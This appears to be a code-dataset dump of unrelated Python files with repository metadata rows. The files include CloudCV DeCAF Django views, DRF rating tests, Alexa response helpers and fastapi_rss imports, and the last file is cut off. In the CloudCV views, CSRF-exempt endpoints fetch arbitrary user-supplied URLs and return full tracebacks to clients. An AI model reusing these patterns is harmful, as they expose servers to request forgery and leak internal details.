from presalytics_story.models.ooxml_document_all_of import OoxmlDocumentAllOf
from presalytics_story.models.outline import Outline
from presalytics_story.models.permission_type import PermissionType
from presalytics_story.models.permission_type_all_of import PermissionTypeAllOf
from presalytics_story.models.problem_detail import ProblemDetail
from presalytics_story.models.story import Story
from presalytics_story.models.story_all_of import StoryAllOf
from presalytics_story.models.story_collaborator import StoryCollaborator
from presalytics_story.models.story_collaborator_all_of import StoryCollaboratorAllOf
from presalytics_story.models.story_outline_history import StoryOutlineHistory
from presalytics_story.models.story_outline_history_all_of import StoryOutlineHistoryAllOf
| 42.166667 | 124 | 0.864032 | 158 | 1,265 | 6.664557 | 0.35443 | 0.185185 | 0.246914 | 0.320988 | 0.376068 | 0.317189 | 0.08547 | 0 | 0 | 0 | 0 | 0.006087 | 0.090909 | 1,265 | 29 | 125 | 43.62069 | 0.909565 | 0.223715 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1597772c6e83854d8ef1f4215a80a3bead638cb2 | 14,489 | py | Python | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 11 | 2016-02-29T21:12:58.000Z | 2016-07-06T22:29:22.000Z | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 9 | 2016-03-04T15:51:34.000Z | 2016-05-29T10:28:02.000Z | app/decaf_views.py | aroranipun04/CloudCV-Old | c17f5be8a221532c77d413b6afc6bd0be5e4f788 | [
"MIT"
] | 16 | 2016-02-23T03:22:02.000Z | 2016-07-09T18:46:34.000Z | __author__ = 'dexter'
from os.path import splitext, basename
from urlparse import urlparse
from querystring_parser import parser
from PIL import Image
from django.views.generic import CreateView
from django.views.decorators.csrf import csrf_exempt
from app.models import Picture, Decaf, Decafmodel
import app.conf as conf
from .response import JSONResponse, response_mimetype
from celeryTasks.webTasks.decafTask import decafImages
from cloudcv17 import config
import time
import os
import json
import traceback
import shortuuid
import requests
import redis
import re
redis_obj = redis.StrictRedis(host=config.REDIS_HOST, port=6379, db=0)
ps_obj = redis_obj.pubsub()
decaf_channel_name = 'decaf_server_queue'
IMAGEFOLDER = '/srv/share/cloudcv/jobs/'
DEMO_IMAGE_PATH = '/srv/share/cloudcv/jobs/demo'
def log_to_terminal(message, socketid):
redis_obj.publish('chat', json.dumps({'error': str(message), 'socketid': str(socketid)}))
def decaf_wrapper_local(src_path, output_path, socketid, result_path, single_file_name='', modelname=''):
try:
src_path = os.path.join(src_path, single_file_name)
if os.path.isdir(src_path):
result_url = urlparse(result_path).path
result_path = os.path.join(result_url, 'results')
else:
result_url = os.path.dirname(urlparse(result_path).path)
result_path = os.path.join(result_url, 'results')
decafImages.delay(src_path, socketid, output_path, result_path)
except:
log_to_terminal(str(traceback.format_exc()), socketid)
class DecafCreateView(CreateView):
model = Decaf
r = None
socketid = None
fields = "__all__"
def getThumbnail(self, image_url_prefix, name):
im = Image.open('/var/www/html/cloudcv/fileupload' + image_url_prefix + name)
size = 128, 128
im.thumbnail(size, Image.ANTIALIAS)
filename, fileext = splitext(basename(name))
file = image_url_prefix + 'thumbnails/' + filename + '.' + fileext
im.save('/var/www/html/cloudcv/fileupload' + file)
return file
count_hits = 0
def form_valid(self, form):
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
self.socketid = self.request.POST['socketid-hidden']
try:
self.object = form.save()
all_files = self.request.FILES.getlist('file')
data = {'files': []}
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
old_save_dir = os.path.dirname(conf.PIC_DIR)
folder_name = str(shortuuid.uuid())
save_dir = os.path.join(conf.PIC_DIR, folder_name)
output_path = os.path.join(save_dir, 'results')
# Make the new directory based on time
if not os.path.exists(save_dir):
os.makedirs(save_dir)
os.makedirs(os.path.join(save_dir, 'results'))
if len(all_files) == 1:
log_to_terminal(str('Downloading Image...'), self.socketid)
else:
log_to_terminal(str('Downloading Images...'), self.socketid)
for file in all_files:
try:
a = Picture()
tick = time.time()
strtick = str(tick).replace('.', '_')
fileName, fileExtension = os.path.splitext(file.name)
file.name = fileName + strtick + fileExtension
a.file.save(file.name, file)
file.name = a.file.name
imgfile = Image.open(os.path.join(old_save_dir, file.name))
size = (500, 500)
imgfile.thumbnail(size, Image.ANTIALIAS)
imgfile.save(os.path.join(save_dir, file.name))
thumbPath = os.path.join(folder_name, file.name)
data['files'].append({
'url': conf.PIC_URL + thumbPath,
'name': file.name,
'type': 'image/png',
'thumbnailUrl': conf.PIC_URL + thumbPath,
'size': 0,
})
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Processing Image...'), self.socketid)
else:
log_to_terminal(str('Processing Images...'), self.socketid)
time.sleep(.5)
# This is for running it locally ie on Godel
decaf_wrapper_local(save_dir, output_path, self.socketid, os.path.join(conf.PIC_URL, folder_name))
# This is for posting it on Redis - ie to Rosenblatt
# classify_wrapper_redis(job_directory, socketid, result_folder)
response = JSONResponse(data, {}, response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def get_context_data(self, **kwargs):
context = super(DecafCreateView, self).get_context_data(**kwargs)
context['pictures'] = Decaf.objects.all()
return context
@csrf_exempt
def demoDecaf(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'src' not in post_dict:
# Run on all images:
imgname = ''
img_url = os.path.join(os.path.dirname(urlparse(conf.PIC_URL.rstrip('/')).path), 'demo')
else:
data = {'info': 'Processing'}
img_url = post_dict['src']
imgname = basename(urlparse(img_url).path)
output_path = os.path.join(conf.LOCAL_DEMO_PIC_DIR, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
log_to_terminal('Processing image...', post_dict['socketid'])
# This is for running it locally ie on Godel
decaf_wrapper_local(conf.LOCAL_DEMO_PIC_DIR, output_path, post_dict['socketid'], img_url, imgname)
# This is for posting it on Redis - ie to Rosenblatt
# classify_wrapper_redis(image_path, post_dict['socketid'], result_path)
data = {'info': 'Completed'}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
except:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def decafDemo(request):
post_dict = parser.parse(request.POST.urlencode())
log_to_terminal('Processing Demo Images Now', post_dict['socketid'])
if 'src' in post_dict and post_dict['src'] != '':
file_name = basename(urlparse(post_dict['src']).path)
redis_obj.publish(decaf_channel_name, json.dumps(
{'dir': DEMO_IMAGE_PATH, 'flag': '2', 'socketid': post_dict['socketid'], 'demo': 'True', 'filename': file_name}))
else:
redis_obj.publish(decaf_channel_name, json.dumps(
{'dir': DEMO_IMAGE_PATH, 'flag': '2', 'socketid': post_dict['socketid']}))
def downloadAndSaveImages(url_list, socketid):
try:
uuid = shortuuid.uuid()
directory = os.path.join(conf.PIC_DIR, str(uuid))
if not os.path.exists(directory):
os.mkdir(directory)
for url in url_list[""]:
try:
log_to_terminal(str(url), socketid)
file = requests.get(url)
file_full_name_raw = basename(urlparse(url).path)
file_name_raw, file_extension = os.path.splitext(file_full_name_raw)
# First parameter is the replacement, second parameter is your input string
file_name = re.sub('[^a-zA-Z0-9]+', '', file_name_raw)
f = open(os.path.join(conf.PIC_DIR, str(uuid) + file_name + file_extension), 'wb')
f.write(file.content)
f.close()
imgFile = Image.open(os.path.join(conf.PIC_DIR, str(uuid) + file_name + file_extension))
size = (500, 500)
imgFile.thumbnail(size, Image.ANTIALIAS)
imgFile.save(os.path.join(conf.PIC_DIR, str(uuid), file_name + file_extension))
log_to_terminal('Saved Image: ' + str(url), socketid)
except Exception as e:
print str(e)
return uuid, directory
except:
print 'Exception' + str(traceback.format_exc())
@csrf_exempt
def decafDropbox(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'urls' not in post_dict:
data = {'error': 'NoFileSelected'}
else:
data = {'info': 'ProcessingImages'}
# Download these images. Run Feature Extraction. Post results.
uuid, image_path = downloadAndSaveImages(post_dict['urls'], post_dict['socketid'])
output_path = os.path.join(image_path, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
decaf_wrapper_local(image_path, output_path, post_dict['socketid'], os.path.join(conf.PIC_URL, uuid))
log_to_terminal('Processing Images Now', post_dict['socketid'])
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
except:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
class DecafModelCreateView(CreateView):
model = Decafmodel
r = None
socketid = None
def getThumbnail(self, image_url_prefix, name):
im = Image.open('/var/www/html/cloudcv/fileupload' + image_url_prefix + name)
size = 128, 128
im.thumbnail(size, Image.ANTIALIAS)
filename, fileext = splitext(basename(name))
file = image_url_prefix + 'thumbnails/' + filename + '.' + fileext
im.save('/var/www/html/cloudcv/fileupload' + file)
return file
count_hits = 0
def form_valid(self, form):
self.r = redis.StrictRedis(host='localhost', port=6379, db=0)
socketid = self. request.POST['socketid-hidden']
modelname = ''
if 'model-name' in self.request.POST:
modelname = self.request.POST['model-name']
print modelname
self.socketid = socketid
try:
self.object = form.save()
all_files = self.request.FILES.getlist('file')
data = {'files': []}
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
old_save_dir = os.path.dirname(conf.PIC_DIR)
folder_name = str(shortuuid.uuid())
save_dir = os.path.join(conf.PIC_DIR, folder_name)
output_path = os.path.join(save_dir, 'results')
# Make the new directory based on time
if not os.path.exists(save_dir):
os.makedirs(save_dir)
os.makedirs(os.path.join(save_dir, 'results'))
log_to_terminal(str('SocketID: ' + str(self.socketid)), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Downloading Image...'), self.socketid)
else:
log_to_terminal(str('Downloading Images...'), self.socketid)
for file in all_files:
try:
a = Picture()
tick = time.time()
strtick = str(tick).replace('.', '_')
fileName, fileExtension = os.path.splitext(file.name)
file.name = fileName + strtick + fileExtension
a.file.save(file.name, file)
file.name = a.file.name
imgfile = Image.open(os.path.join(old_save_dir, file.name))
size = (500, 500)
imgfile.thumbnail(size, Image.ANTIALIAS)
imgfile.save(os.path.join(save_dir, file.name))
thumbPath = os.path.join(folder_name, file.name)
data['files'].append({
'url': conf.PIC_URL + thumbPath,
'name': file.name,
'type': 'image/png',
'thumbnailUrl': conf.PIC_URL + thumbPath,
'size': 0,
})
except:
log_to_terminal(str(traceback.format_exc()), self.socketid)
if len(all_files) == 1:
log_to_terminal(str('Processing Image...'), self.socketid)
else:
log_to_terminal(str('Processing Images...'), self.socketid)
time.sleep(.5)
# This is for running it locally ie on Godel
decaf_wrapper_local(save_dir, output_path, socketid, os.path.join(
conf.PIC_URL, folder_name), modelname=modelname)
# This is for posting it on Redis - ie to Rosenblatt
# classify_wrapper_redis(job_directory, socketid, result_folder)
response = JSONResponse(data, {}, response_mimetype(self.request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
def get_context_data(self, **kwargs):
context = super(DecafModelCreateView, self).get_context_data(**kwargs)
context['pictures'] = Decaf.objects.all()
return context
@csrf_exempt
def decaf_train(request):
post_dict = parser.parse(request.POST.urlencode())
try:
if 'urls' not in post_dict:
data = {'error': 'NoFileSelected'}
else:
data = {'info': 'ProcessingImages'}
# Download these images. Run Feature Extraction. Post results.
uuid, image_path = downloadAndSaveImages(post_dict['urls'], post_dict['socketid'])
output_path = os.path.join(image_path, 'results')
if not os.path.exists(output_path):
os.makedirs(output_path)
decaf_wrapper_local(image_path, output_path, post_dict['socketid'], os.path.join(conf.PIC_URL, uuid))
log_to_terminal('Processing Images Now', post_dict['socketid'])
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
except:
data = {'result': str(traceback.format_exc())}
response = JSONResponse(data, {}, response_mimetype(request))
response['Content-Disposition'] = 'inline; filename=files.json'
return response
| 38.330688 | 125 | 0.613983 | 1,711 | 14,489 | 5.023963 | 0.137931 | 0.029316 | 0.03141 | 0.02792 | 0.743253 | 0.723243 | 0.713239 | 0.713239 | 0.700093 | 0.691252 | 0 | 0.005745 | 0.267168 | 14,489 | 377 | 126 | 38.432361 | 0.803824 | 0.052937 | 0 | 0.67931 | 0 | 0 | 0.106523 | 0.013133 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.065517 | null | null | 0.010345 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ec8480cb8ffa6c24932c53cc5349abb243139ccf | 4,281 | py | Python | authors/apps/ratings/tests/test_ratings.py | andela/ah-jumanji- | a304718929936dd4a759d737fb3570d6cc25fb76 | [
"BSD-3-Clause"
] | 1 | 2018-12-23T15:31:54.000Z | 2018-12-23T15:31:54.000Z | authors/apps/ratings/tests/test_ratings.py | andela/ah-jumanji- | a304718929936dd4a759d737fb3570d6cc25fb76 | [
"BSD-3-Clause"
] | 26 | 2018-11-27T09:13:15.000Z | 2021-06-10T20:58:57.000Z | authors/apps/ratings/tests/test_ratings.py | andela/ah-jumanji- | a304718929936dd4a759d737fb3570d6cc25fb76 | [
"BSD-3-Clause"
] | 2 | 2019-01-10T22:14:28.000Z | 2019-11-04T07:33:43.000Z | from rest_framework.reverse import reverse
from rest_framework import status
import logging
import json
# local imports
from .test_base import TestBase
logger = logging.getLogger(__file__)
class TestRatings(TestBase):
''' Ratings test cases '''
def test_post_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"Rating added successfully")
def test_post_bad_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.bad_rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['errors']['rating'],
['"10" is not a valid choice.'])
def test_article_author_cannot_rate(self):
self.client.credentials(
HTTP_AUTHORIZATION='Token ' +
self.author_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": self.slug}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"You cannot rate your own article")
def test_get_average_rating(self):
self.client.credentials(
HTTP_AUTHORIZATION='Token ' +
self.author_token)
response = self.client.get(
reverse(
'ratings',
kwargs={
"slug": self.slug
}),
format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['rating'],
5.0)
def test_delete_rating(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.delete(
reverse(
'delete_rating',
kwargs={
"slug": self.slug,
"id": self.id
}),
format='json')
logger.error(response.content)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['message'],
"Rating removed successfully")
def test_article_not_found_rate(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.post(
reverse(
'ratings',
kwargs={
"slug": "not-found"}),
data=self.rating,
format='json')
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['detail'],
"Article Not found")
def test_delete_rating_not_found(self):
self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.rater_token)
response = self.client.delete(
reverse(
'delete_rating',
kwargs={
"slug": self.slug,
"id": 12
}),
format='json')
logger.error(response.content)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertEqual(
json.loads(
response.content.decode('utf-8'))['detail'],
"Rating Not found")
| 33.708661 | 79 | 0.543097 | 413 | 4,281 | 5.460048 | 0.193705 | 0.062084 | 0.043459 | 0.077605 | 0.773392 | 0.773392 | 0.759202 | 0.759202 | 0.759202 | 0.726829 | 0 | 0.012173 | 0.347582 | 4,281 | 126 | 80 | 33.97619 | 0.795202 | 0.007942 | 0 | 0.716814 | 0 | 0 | 0.094811 | 0 | 0 | 0 | 0 | 0 | 0.123894 | 1 | 0.061947 | false | 0 | 0.044248 | 0 | 0.115044 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ec9a7f12bc9fcc9f6a4bc5f7792d44adf4ba04ca | 492 | py | Python | fastapi_rss/models/__init__.py | elreydetoda/fastapi_rss | 94539937fed408a6918ab45a378e46a6cf179bde | [
"MIT"
] | 8 | 2021-03-23T10:37:12.000Z | 2022-02-05T07:47:12.000Z | fastapi_rss/models/__init__.py | elreydetoda/fastapi_rss | 94539937fed408a6918ab45a378e46a6cf179bde | [
"MIT"
] | 1 | 2022-03-25T23:26:55.000Z | 2022-03-31T19:50:18.000Z | fastapi_rss/models/__init__.py | elreydetoda/fastapi_rss | 94539937fed408a6918ab45a378e46a6cf179bde | [
"MIT"
] | 3 | 2021-04-13T06:16:05.000Z | 2022-01-13T03:38:33.000Z | # flake8: noqa
from fastapi_rss.models.category import Category, CategoryAttrs
from fastapi_rss.models.image import Image
from fastapi_rss.models.cloud import Cloud, CloudAttrs
from fastapi_rss.models.item import Item
from fastapi_rss.models.textinput import TextInput
from fastapi_rss.models.enclosure import Enclosure, EnclosureAttrs
from fastapi_rss.models.guid import GUID, GUIDAttrs
from fastapi_rss.models.source import Source, SourceAttrs
from fastapi_rss.models.feed import RSSFeed
| 37.846154 | 66 | 0.855691 | 70 | 492 | 5.885714 | 0.314286 | 0.240291 | 0.305825 | 0.436893 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002242 | 0.093496 | 492 | 12 | 67 | 41 | 0.921525 | 0.02439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ecbb8f9cec5c0dd98bc6295c5693d7756700c836 | 129 | py | Python | app/api/__init__.py | Andrewpqc/URL-shortener | 74943b9f1f787e243a32e27eec425eb51f84e65e | [
"MIT"
] | 9 | 2018-07-01T11:19:05.000Z | 2021-12-30T03:00:03.000Z | app/api/__init__.py | Andrewpqc/URL-shortener | 74943b9f1f787e243a32e27eec425eb51f84e65e | [
"MIT"
] | 1 | 2020-12-09T23:46:04.000Z | 2020-12-09T23:46:04.000Z | app/api/__init__.py | Andrewpqc/URL-shortener | 74943b9f1f787e243a32e27eec425eb51f84e65e | [
"MIT"
] | 1 | 2018-06-06T15:10:57.000Z | 2018-06-06T15:10:57.000Z | # coding: utf-8
from flask import Blueprint
api=Blueprint("api",__name__)
from . import statistics, urlmap, user,authentication | 21.5 | 53 | 0.782946 | 17 | 129 | 5.705882 | 0.764706 | 0.247423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008772 | 0.116279 | 129 | 6 | 53 | 21.5 | 0.842105 | 0.100775 | 0 | 0 | 0 | 0 | 0.026087 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
01c9b97af3b426bee5f2120f7e15eb76b304be31 | 111 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/dumbo/calculators/calc_rail.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 69 | 2021-12-16T01:34:09.000Z | 2022-03-31T08:27:39.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/dumbo/calculators/calc_rail.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/dumbo/calculators/calc_rail.py | SiliconLabs/gecko_sdk | 310814a9016b60a8012d50c62cc168a783ac102b | [
"Zlib"
] | 21 | 2021-12-20T09:05:45.000Z | 2022-03-28T02:52:28.000Z | from pyradioconfig.parts.common.calculators.calc_rail import CalcRail
class CalcRailDumbo(CalcRail):
pass
| 22.2 | 69 | 0.828829 | 13 | 111 | 7 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 111 | 4 | 70 | 27.75 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
bf32eb85a3492df2e0f4978d55de524a878a9094 | 48 | py | Python | Codewars/last_digit_of_a_large_number - (5 kyu).py | maxcohen31/A-bored-math-student | 007beb4dabf7b4406f48e9a3a967c29d032eab89 | [
"MIT"
] | null | null | null | Codewars/last_digit_of_a_large_number - (5 kyu).py | maxcohen31/A-bored-math-student | 007beb4dabf7b4406f48e9a3a967c29d032eab89 | [
"MIT"
] | null | null | null | Codewars/last_digit_of_a_large_number - (5 kyu).py | maxcohen31/A-bored-math-student | 007beb4dabf7b4406f48e9a3a967c29d032eab89 | [
"MIT"
] | null | null | null | def last_digit(a, b):
return pow(a, b, 10)
| 12 | 24 | 0.583333 | 10 | 48 | 2.7 | 0.8 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.25 | 48 | 3 | 25 | 16 | 0.694444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
174d4e9708465fbd0f226f8b496fd207fb26dc8e | 2,874 | py | Python | src/alexa_response_builder/__init__.py | parveenchahal/AlexaSkill_PCSongs | 2368ff6b15fe76996a2943d11a9275573c6daa7f | [
"MIT"
] | null | null | null | src/alexa_response_builder/__init__.py | parveenchahal/AlexaSkill_PCSongs | 2368ff6b15fe76996a2943d11a9275573c6daa7f | [
"MIT"
] | null | null | null | src/alexa_response_builder/__init__.py | parveenchahal/AlexaSkill_PCSongs | 2368ff6b15fe76996a2943d11a9275573c6daa7f | [
"MIT"
] | null | null | null | def build_response(response: dict, session_attributes: dict = {}, version: str = '1.0'):
return {
'version': version,
'sessionAttributes': session_attributes,
'response': response
}
def build_empty_response():
return {
'shouldEndSession': True
}
def build_pause_response(output: str = ""):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Stop'
}],
'shouldEndSession': True
}
def build_stop_response(output: str = ""):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Stop'
}],
'shouldEndSession': True
}
def build_speechlet_response(output: str, should_end_session: bool = True):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'shouldEndSession': should_end_session
}
def build_audio_response(url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
}
def build_audio_speechlet_response(output: str, url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
}
def build_enqueue_audio_response(url: str, token: str, should_end_session: bool = True, offsetInMilliseconds: int = 0, play_behaviour = 'REPLACE_ALL'):
return {
'directives': [{
'type': 'AudioPlayer.Play',
'playBehavior': play_behaviour,
'audioItem': {
'stream': {
'token': str(token),
'url': url,
'offsetInMilliseconds': offsetInMilliseconds
}
}
}],
'shouldEndSession': should_end_session
} | 29.326531 | 166 | 0.510786 | 216 | 2,874 | 6.592593 | 0.189815 | 0.044944 | 0.089888 | 0.087079 | 0.823736 | 0.823736 | 0.775983 | 0.744382 | 0.744382 | 0.719803 | 0 | 0.002749 | 0.367084 | 2,874 | 98 | 167 | 29.326531 | 0.780099 | 0 | 0 | 0.674157 | 0 | 0 | 0.212522 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089888 | false | 0 | 0 | 0.089888 | 0.179775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
176af3ef3eb8c7e7dfc9fd3281ad53b62509741c | 235 | py | Python | plugins/quetz_repodata_patching/setup.py | davidbrochart/quetz | fd9b95add5b8f7a1c0863e7e08bf5a6ab5b84984 | [
"BSD-3-Clause"
] | 1 | 2021-08-23T02:49:04.000Z | 2021-08-23T02:49:04.000Z | plugins/quetz_repodata_patching/setup.py | davidbrochart/quetz | fd9b95add5b8f7a1c0863e7e08bf5a6ab5b84984 | [
"BSD-3-Clause"
] | 2 | 2021-08-23T02:49:01.000Z | 2022-02-27T22:07:37.000Z | plugins/quetz_repodata_patching/setup.py | davidbrochart/quetz | fd9b95add5b8f7a1c0863e7e08bf5a6ab5b84984 | [
"BSD-3-Clause"
] | 3 | 2021-09-10T10:03:51.000Z | 2021-09-16T07:28:51.000Z | from setuptools import setup
setup(
name="quetz-repodata_patching",
install_requires="quetz",
entry_points={"quetz": ["quetz-repodata_patching = quetz_repodata_patching.main"]},
packages=["quetz_repodata_patching"],
)
| 26.111111 | 87 | 0.740426 | 26 | 235 | 6.384615 | 0.538462 | 0.313253 | 0.506024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12766 | 235 | 8 | 88 | 29.375 | 0.809756 | 0 | 0 | 0 | 0 | 0 | 0.468085 | 0.412766 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1795872f3e6a4016771f03180469ac5eb0cb718b | 1,755 | py | Python | Home/views.py | NAL0/nalbt | c411ead60fac8923e960e67f4bbad5c7aeffc614 | [
"MIT"
] | null | null | null | Home/views.py | NAL0/nalbt | c411ead60fac8923e960e67f4bbad5c7aeffc614 | [
"MIT"
] | null | null | null | Home/views.py | NAL0/nalbt | c411ead60fac8923e960e67f4bbad5c7aeffc614 | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
# Create your views here.
def index(request):
return render(request, 'Home/home.html')
def index2(request):
return render(request, "Home/SDG's.html")
@login_required
def index3(request):
return render(request, 'Home/constitutive_act.html')
def index4(request):
return render(request, 'Home/2.html')
def index5(request):
return render(request, 'Home/SADC_national_anthem.html')
def index6(request):
